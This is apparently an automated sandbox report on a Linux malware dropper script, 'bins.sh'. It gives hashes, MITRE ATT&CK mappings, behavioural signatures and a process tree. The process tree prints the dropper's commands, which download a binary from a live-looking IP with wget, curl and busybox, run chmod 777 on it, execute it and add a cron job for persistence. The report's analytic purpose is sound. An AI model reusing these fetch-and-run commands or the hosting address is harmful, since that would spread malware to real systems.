65bb3378f20346a669cf034ec3b3d7760f53296e957bd7a6d3e64bd9e0cd608c

General

Target

bins.sh
Size

10KB
MD5

df284d43c50345c61fb4802b4396a3b3
SHA1

ce94f3d5873280df0c3479ecd725dead3d66b5d7
SHA256

65bb3378f20346a669cf034ec3b3d7760f53296e957bd7a6d3e64bd9e0cd608c
SHA512

3ed1bc581779962db46652c8e0bf1911156c49bc6b5310e7012e499cdcd8ba85876d11fae05c70e0fc4939828d3aa737bf3ff3d3d1ec4e77fa6d85c8460bb031
SSDEEP

192:y5FjD5EdIO+SHL394wy2tQgL394wj0twjD5EdI3:y5K+SHL394wy6QgL394wjwO

Score

9^/10

antivm defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

Contacts a large (2125) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmod

pid process

724 chmod
Executes dropped EXE 1 IoCs

Processes:

U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT

ioc pid process

/tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT 727 U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
Renames itself 1 IoCs

Processes:

U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT

pid process

728 U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
execution persistence privilege_escalatio

Cron
T1053.003

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.cuGRpr crontab
Enumerates running processes
Discovers information about currently running processes on the system
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

System Checks
T1497.001

Processes:

curl

description ioc process

File opened for reading /proc/cpuinfo curl

pid	process
724	chmod

ioc	pid	process
/tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT	727	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT

pid	process
728	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.cuGRpr	crontab

description	ioc	process
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

U59jXOydvquUhHn4MKkSAbnLlVezXQJxQTcrontabcurl

description	ioc	process
File opened for reading	/proc/948/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/968/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1066/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/765/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/890/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/914/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/935/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/3/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/586/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/769/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/773/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1068/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/6/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/304/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1056/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/934/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/979/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1031/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/748/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/779/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/783/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/896/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/911/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1032/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/786/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/864/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/960/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/20/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/82/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/148/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/887/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1044/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/817/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/921/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/925/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/10/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/314/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/655/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/788/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/810/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/933/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1073/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/21/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1062/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/16/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/24/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/823/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/871/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/922/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/988/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1024/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1054/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/25/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/271/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/600/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/877/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/952/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1011/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/112/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/770/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/931/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/947/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetcurlbusybox

description	ioc	process
File opened for modification	/tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT	wget
File opened for modification	/tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT	curl
File opened for modification	/tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:652
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:661
- /usr/bin/wget
  wget http://216.126.231.240/bins/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
  2⤵
  - Writes file to tmp directory
  PID:663
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:704
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
  2⤵
  - Writes file to tmp directory
  PID:716
- /bin/chmod
  chmod 777 U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
  2⤵
  - File and Directory Permissions Modification
  PID:724
- /tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
  ./U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:727
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:729
  - - /usr/bin/crontab
      crontab -l
      4⤵
      Reads runtime system information
      PID:730
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:732
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:733
- /bin/rm
  rm U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
  2⤵
  PID:739
- /usr/bin/wget
  wget http://216.126.231.240/bins/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
  2⤵
  PID:742

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

1

T1053

Cron

1

T1053.003

Persistence

Scheduled Task/Job

1

T1053

Cron

1

T1053.003

Privilege Escalation

Scheduled Task/Job

1

T1053

Cron

1

T1053.003

Defense Evasion

File and Directory Permissions Modification

1

T1222

Linux and Mac File and Directory Permissions Modification

1

T1222.002

Virtualization/Sandbox Evasion

1

T1497

System Checks

1

T1497.001

Credential Access

Discovery

Network Service Discovery

2

T1046

Virtualization/Sandbox Evasion

1

T1497

System Checks

1

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT

Filesize
141KB

MD5
3ca8decdb1e52c423c521bfff02ac200

SHA1
8621ecd6807109b8541912ad9e134f6fb49bfd48

SHA256
dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

SHA512
b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

Download Submit
/var/spool/cron/crontabs/tmp.cuGRpr

Filesize
210B

MD5
d164b8b92af244f91a703b8f5a77e97f

SHA1
068c688f83ae1bc91c432868d39f43111df2f4b3

SHA256
5e30aee6125f00e8cd49ee06affe62695192efeec409011e31c40a540e502efb

SHA512
cbe47e4779544300a7d577411941d42f04876eca80fcf3efe6520384faf31c07b589c2a3cb222ec94c894a2fa587e71ac053b1c0ae5d113115ff25855bba1c85

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads